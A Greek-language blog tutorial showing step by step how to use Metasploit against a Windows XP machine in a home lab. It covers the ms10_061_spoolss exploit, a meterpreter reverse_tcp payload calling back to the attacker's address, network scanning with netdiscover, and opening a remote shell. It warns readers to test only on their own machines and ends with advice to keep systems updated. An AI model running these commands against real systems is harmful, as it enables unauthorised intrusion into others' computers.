Στο προηγούμενο άρθρο μιλήσαμε για το τι είναι το Metasploit Framework. Τώρα είναι ώρα να το δούμε πως λειτουργεί στη πράξη. ΠΡΟΣΟΧΗ!!! οτι παραδείγματα θα δείξουμε παρακάτω, τα δοκιμάζουμε πάντα σε δικούς μας υπολογιστές ή σε κάποιο Virtual Machine.
Στο παρακάτω παράδειγμα χρησιμοποιώ έναν υπολογιστή που τρέχει Kali Linux και έναν δεύτερο με Windows Xp. Με την βοήθεια του Metasploit Framework θα προσπαθήσουμε να κατακτήσουμε το pc με τα Windows Xp.
Πάμε να ξεκινήσουμε....
Βάζουμε μπροστά τα Kali Linux.
Ανοίγουμε ένα terminal και ξεκινάμε το Metasploit Framwork με την εντολή :
msfconsole
πατάμε enter κι περιμένουμε
Το exploit που θα χρησιμοποιήσουμε είναι το ms10_061_spoolss το οποίο στέλνει ένα αίτημα WritePrinter στο στόχο μας και μας δίνει πλήρη πρόσβαση στα αρχεία του.
Στο terminal γράφουμε : search ms10_061_spoolss
Με την εντολή "search" ψάχνουμε στη βάση δεδομένων τα exploits που θέλουμε να χρησιμοποιήσουμε. Μπορούμε για παράδειγμα να γράψουμε Windows και θα μας βγάλει κάποιες επιλογές. Σε επόμενο άρθρο θα μάθουμε πως να ψάχνουμε exploits.
Το αποτέλεσμα που θα πάρουμε είναι το παρακάτω ...
Στη συνέχεια δίνουμε την εντολή use και τη διεύθυνση του exploit
use exploit/windows/smb/ms10_061_spoolss
και πατάμε enetr
Στη συνέχεια πρέπει να δημιουργήσουμε το payload έτσι ώστε να ανοίξουμε τη σύνδεση μεταξύ του στόχου και του υπολογιστή μας
δίνουμε την εντολή :
set payload windows/meterpreter/reverse_tcp
Με την εντολή info μπορούμε να δούμε τα χαρακτηριστικά του exploit. Με την εντολή show options βλέπουμε τις απαιτήσεις και τα στοιχεία που πρέπει να συμπληρώσουμε .
Παραπάνω βλέπουμε τα αποτελέσματα που μας δίνει η εντολή show options
RHOST είναι η ip του υπολογιστή που θέλουμε να χακάρουμε
RPORT είναι η πόρτα του στόχου μας
LHOST είναι η δική μας ip
LHOST η δική μας πόρτα
Για να βρούμε τη δική μας ip στο δίκτυο ανοίγουμε ένα καινούριο terminal και γράφουμε την εντολή ifconfig
Στο δικό μου παράδειγμα η ip μου είναι 192.168.2.9
Για να βρούμε την ip του στόχου μας ή πρέπει να σκεφτούμε έναν έξυπνο τρόπο όπως ένα website που να τραβάει την ip ( θα τα δούμε σε επόμενα) ή στο παράδειγμά μας θα ανοίξω ένα καινούριο terminal και με την εντολή netdiscover θα σκανάρω όλο το δίκτυο μου
netdiscover -r 192.168.2.0/24
το -r είναι η εντολή range. Η δική σας τοπική ip μπορεί να είναι 192.168.1.0/24. Το 0/24 στο τέλος είναι πως θέλω να ψάξει όλες τις ip 0 έως 255
Η ip του στόχου μου είναι 192.168.2.8
Πάμε ξανα στο αρχικό μας terminal και δίνουμε την ip του στόχου μας
set RHOST 192.168.2.8
Δίνουμε και τη δική μας ip
set LHOST 192.168.2.9
Πατάμε enter και τέλος είναι ώρα να ξεκινήσουμε το exploit
Δίνουμε την Εντολή
exploit
Αφήνουμε το Metasploit να κάνει τη δουλειά του. Μπορεί να μην πιάσει με την πρώτη, ξανα δώστε την τελευταία εντολή.
Αν σας ανοίξει το meterpreter τότε έχετε σύνδεση.
Δίνουμε την εντολή shell και μπαίνουμε στα αρχεία του Windows Xp υπολογιστή.
Με την εντολή exit βγαίνουμε από το Shell και γυρνάμε στο meterpreter.
Εάν δώσουμε την εντολή show options στο meterpreter βλέπουμε όλες τις δυνατότητες που μας δίνει το exploit.
Πως Μπορούμε να αποφύγουμε το παραπάνω hacking ?
ΠΡΕΠΕΙ ΝΑ ΑΝΑΒΑΘΜΙΖΟΥΜΕ ΠΑΝΤΑ ΤΟΝ ΥΠΟΛΟΓΙΣΤΗ ΜΑΣ
Δεν υπάρχουν σχόλια:
Δημοσίευση σχολίου